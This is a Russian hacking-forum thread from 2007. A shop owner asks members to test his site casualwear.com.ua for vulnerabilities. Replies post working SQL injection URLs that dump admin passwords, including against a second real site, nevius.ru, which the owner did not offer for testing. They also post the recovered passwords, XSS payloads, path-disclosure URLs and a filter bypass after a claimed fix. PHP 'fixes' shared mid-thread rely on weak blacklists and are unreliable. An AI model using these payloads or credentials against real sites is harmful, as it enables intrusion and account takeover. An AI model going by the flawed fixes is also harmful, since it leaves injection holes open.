Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.08.2007, 20:18
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 44
Провел на форуме:
189948
Репутация:
12
|
|
Проверьте плиз сайтег
Проверьте плз на уязвимости
www.casualwear.com.ua
|
|
|
13.08.2007, 21:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
ну ты даешь автор, такую херню продавать за такие бабки.. =\ (я о скриптах)
Код:
http://casualwear.com.ua/list.php?link=19+union+select+1,concat_ws(0x3a,pass,version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+from+adminip/*
Код:
http://casualwear.com.ua/admin.php?admin
pass:vfhrtnbyu
Код:
http://nevius.ru/list.php?link=19+union+select+1,2,3,concat_ws(0x3a,pass,version()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+adminip/*
Код:
http://nevius.ru/admin.php
pass:nevada
__________________
ПИУ-ПИУ...
|
|
|
|
13.08.2007, 22:11
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
c411k обогнал... я просто только заметил.. там кста тоже скуль и ксс
sql-inj, XSS..
http://casualwear.com.ua/list.php?c=Pringle+of+Scotland'+%22%3E%3Cscript%3E alert(/halkfild/)%3C/script%3E/*
http://casualwear.com.ua/list.php?c=Pringle+of+Scotland'+order+by+33/*
вообщем дальше не интересно.. так как есть пасс  и вообще полное разоблачение.. 
*добавлено
раскрытие путей
http://casualwear.com.ua/adminexe.php?export
var/www/casualwear/casualwear.com.ua/adminexe.php
Последний раз редактировалось halkfild; 13.08.2007 в 22:28..
|
|
|
|
14.08.2007, 00:17
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Конечно с c411k не сравнить, но
Раскрытие пути
http://www.casualwear.com.ua/list.php?c=NOmeR1&r=&page[]
И XSS
http://www.casualwear.com.ua/list.php?srmin="><script>alert()</script>
Последний раз редактировалось NOmeR1; 14.08.2007 в 00:19..
|
|
|
|
14.08.2007, 15:23
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 44
Провел на форуме:
189948
Репутация:
12
|
|
1
Огромное спасибо, всем по +!
А скриптами я не торгую, просто стянул демку и переписал под себя магаз.
Если не трудно. скажите как от этого всего защититься. Заранее благодарю.
|
|
|
|
14.08.2007, 15:34
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Сообщение от Marlboro_X
Огромное спасибо, всем по +!
А скриптами я не торгую, просто стянул демку и переписал под себя магаз.
Если не трудно. скажите как от этого всего защититься. Заранее благодарю.
Я писал по жтому поводу скрипты. Ещё раз напишу
XSS
PHP код:
<?
...
$_GET['уязвимое_поле'] = htmlspecialchars($_GET['уязвимое_поле']);
...
?>
PHP-inj
PHP код:
<?
error_reporting(0);
...
function inc($do,$inc,$posle)
{
$inc = htmlspecialchars($inc);
if(file($do.$inc.$posle))
{
$inc = str_replace('http','',$inc);
$inc = str_replace('ftp','',$inc);
$inc = str_replace(':','',$inc);
$inc = str_replace('/','',$inc);
$inc = str_replace('\\','',$inc);
$inc = str_replace('.','',$inc);
include($do.$inc.$posle);
}
else echo 'Файла не существует';
}
...
if($_GET['page']) inc('',$_GET['page'],'.php');
...
?>
SQL-inj:
PHP код:
<?
...
function secure_sql($value) {
if( get_magic_quotes_gpc() ) {
$value = stripslashes( $value );
}
if( function_exists( "mysql_real_escape_string" ) ) {
$value = mysql_real_escape_string( $value );
} else {
$value = addslashes( $value );
}
return $value;
}
...
?>
|
|
|
|
15.08.2007, 23:21
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 44
Провел на форуме:
189948
Репутация:
12
|
|
1
Вроде фсе поправил. Попробуйте щас поковырять.
Сайт прежний www.casualwear.com.ua
|
|
|
|
15.08.2007, 23:27
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
xss
http://casualwear.com.ua/list.php?c=%22%3E%3Cscript%3Ealert()%3C/script%3E&r=&page=1&ord=ord&srmin=0&srmax=10000000 0&a=&p=1
|
|
|
|
15.08.2007, 23:48
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Сообщение от Marlboro_X
Вроде фсе поправил. Попробуйте щас поковырять.
Сайт прежний www.casualwear.com.ua
|
|
|
|
16.08.2007, 00:22
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
посылать на ... - это конечно очень эстетично, и наверно очень помогает обезопасить сайт, но все же фильтрации символа запятой не достаточно:
Код:
http://www.casualwear.com.ua/list.php?link=114+union+select+1%2C2%2C3%2Cpass%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33+from+adminip/*
pass:1234567890
админка там же все подходит =\ |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?437725){kind=avatar}
Похожие темы
Линейный вид
